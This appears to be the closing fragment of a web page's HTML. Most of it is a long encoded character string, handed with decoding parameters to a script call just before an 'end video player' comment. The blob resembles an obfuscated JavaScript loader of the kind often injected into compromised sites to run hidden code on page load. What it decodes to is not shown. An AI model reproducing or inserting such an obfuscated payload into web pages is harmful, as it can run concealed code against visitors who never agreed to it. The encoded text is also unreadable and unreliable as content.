IDEVhVEajsEVhVEVIDEVhVEajDEajgEVIDEVhVEaasEVhVEVIDEVhVEajsEaasEVIDEVhVEVhVEajjEVIDEVhhEVhVEaasEVIDEVhhEajgEajsEVIDEVhhEVhVEVhhEVIDEVhhEajgEajDEVIDEVhhEVhhEajDEVIDEVhVEVhVEajDEVIDEVhVEVhVEajjEVIDEVhVEaasEVhVEVIDEVhVEVhVEajsEVIDEVhVEaasEaasEVIDEVhVEaasEVhhEVIDEVhhEVhhEajDEVIDEVhhEVhhEajsEVIDEVhhEaasEVhVEVIDEaasEVhVEVIDEVhVEajjEajsEVIDEaasEVhVEVIDEVVVEVajEVjjEVgDEVajEVVVEajgEVhhEVhVEajDEaasEajsEajjEVIDEVsIEVVVEVajEVjVEVahEVajEVjsEVajEVjgEVjDEVaDEVaDE",98,"DVajgIshE",39,8,16))</script>				<!-- end video player -->

   

</script>



</body>
</html>
